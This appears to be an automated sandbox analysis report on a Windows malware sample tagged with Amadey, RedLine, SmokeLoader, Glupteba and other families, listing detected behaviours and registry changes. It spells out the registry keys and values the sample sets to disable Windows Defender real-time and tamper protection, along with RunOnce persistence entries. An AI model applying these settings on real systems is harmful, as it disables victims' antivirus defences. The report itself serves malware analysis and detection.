Malware Analysis Report

2025-01-23 09:51

Sample ID 231010-zebrcabg43
Target a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0
SHA256 a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google dropper evasion infostealer loader persistence phishing rat trojan mystic lutyr magia discovery rootkit spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0

Threat Level: Known bad

The file a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google dropper evasion infostealer loader persistence phishing rat trojan mystic lutyr magia discovery rootkit spyware stealer

Healer

SectopRAT

RedLine

RedLine payload

Modifies Windows Defender Real-time Protection settings

Glupteba payload

Detect Mystic stealer payload

Detected google phishing page

DcRat

Mystic

SectopRAT payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Detects Healer an antivirus disabler dropper

Glupteba

Amadey

SmokeLoader

Stops running service(s)

Modifies Windows Firewall

Drops file in Drivers directory

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Windows security modification

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Checks SCSI registry key(s)

Modifies Internet Explorer settings

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Modifies data under HKEY_USERS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of UnmapMainImage

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:37

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:37

Reported

2023-10-10 21:00

Platform

win7-20230831-en

Max time kernel

167s

Max time network

194s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2272 created 1196 N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe C:\Windows\Explorer.EXE
PID 2272 created 1196 N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97CD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wg5mI1Lf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wg5mI1Lf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\TT7kp0pz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CDDF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\TT7kp0pz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZD37Ls8.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10E8.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\oW0xB4cw.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Im3XM9DI.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wg5mI1Lf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\TT7kp0pz.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\97CD.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2584 set thread context of 2800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1628 set thread context of 2096 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CC16FB61-67AF-11EE-9FE5-CE1068F0F1D9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CBBFDAB1-67AF-11EE-9FE5-CE1068F0F1D9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CC0A.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
